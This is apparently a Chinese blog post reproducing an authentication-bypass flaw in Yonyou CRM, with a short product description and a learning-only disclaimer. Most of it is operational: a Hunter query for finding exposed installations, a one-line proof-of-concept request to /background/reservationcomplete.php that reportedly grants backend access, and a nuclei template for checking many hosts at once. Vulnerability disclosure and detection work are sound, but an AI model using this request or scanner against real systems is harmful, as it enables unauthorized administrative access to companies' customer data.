【漏洞复现】-用友CRM系统存在逻辑漏洞直接登录后台

免责声明:

本文内容为学习笔记分享,仅供技术学习参考,请勿用作违法用途,未授权的攻击属于非法行为!文章中敏感信息均已做多层打马处理。任何个人和组织利用此文所提供的信息而造成的直接或间接后果和损失,均由使用者本人负责,与作者无关!!!!!!

漏洞描述

用友CRM(Customer Relationship Management,客户关系管理)是由用友公司开发的一款软件,专门设计用于帮助企业管理与客户相关的业务活动。这款软件通常包括客户信息管理、销售管理、市场营销、客户服务和技术支持等功能。用友CRM的目标是帮助企业改善与客户的关系,提升客户满意度,优化销售和服务流程,从而提高企业的市场竞争力。它适用于各种规模的企业,可以根据不同企业的具体需求进行定制和扩展。

漏洞名称

用友CRM系统存在逻辑漏洞直接登录后台

漏洞版本

查询语句

hunter语法: app.name="用友 CRM"

漏洞复现

访问poc,回显空白页面

Poc

http://127.0.0.1:9000/background/reservationcomplete.php?ID=1

再次访问原地址,即可直接绕过验证登录后台

nuclei批量检查脚本

id: yongyouU8_CRM-reservationcomplete

info:

name: 用友CRM系统存在逻辑漏洞直接登录后台

author: wy876

severity: high

http:

  • raw:

  • |

GET /background/reservationcomplete.php?ID=1 HTTP/1.1

Host: {{Hostname}}

Connection: close

User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_4) AppleWebKit/537.36 (KHTML, like Gecko)

  • |

GET / HTTP/1.1

Host: {{Hostname}}

Connection: close

User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_4) AppleWebKit/537.36 (KHTML, like Gecko)

matchers:

  • type: dsl

dsl:

  • 'contains(body_2,"\"msg\": \"bgsesstimeout-\", \"serverName\"")'
相关推荐
tangyal6 小时前
渗透笔记1
笔记·网络安全·渗透
吉吉6111 小时前
浅谈文件包含之伪协议
安全·web安全
吗喽15434518811 小时前
渗透高级第一次作业(笔记整理)
笔记·安全·网络安全
Jerry_Gao92112 小时前
【成长笔记】【web安全】深入Web安全与PHP底层:四天实战课程笔记
笔记·安全·web安全·php·漏洞
遗悲风12 小时前
PHP伪协议全面解析:原理、常用场景、攻防实战与安全防护
android·安全·php
弥生赞歌13 小时前
网安学习第一章(安全事件、安全厂商和安全产品)
安全
吃不吃早饭13 小时前
深入浅出:HTTPS 安全机制 + PHP 文件包含与伪协议全解析
安全·https·php
摘星编程13 小时前
React Native for OpenHarmony 实战:SecureStorage 安全存储详解
安全·react native·react.js
小北方城市网14 小时前
SpringBoot 集成 MyBatis-Plus 实战(高效 CRUD 与复杂查询):简化数据库操作
java·数据库·人工智能·spring boot·后端·安全·mybatis
w***765515 小时前
临时文件自动化管理:高效安全新方案
运维·安全·自动化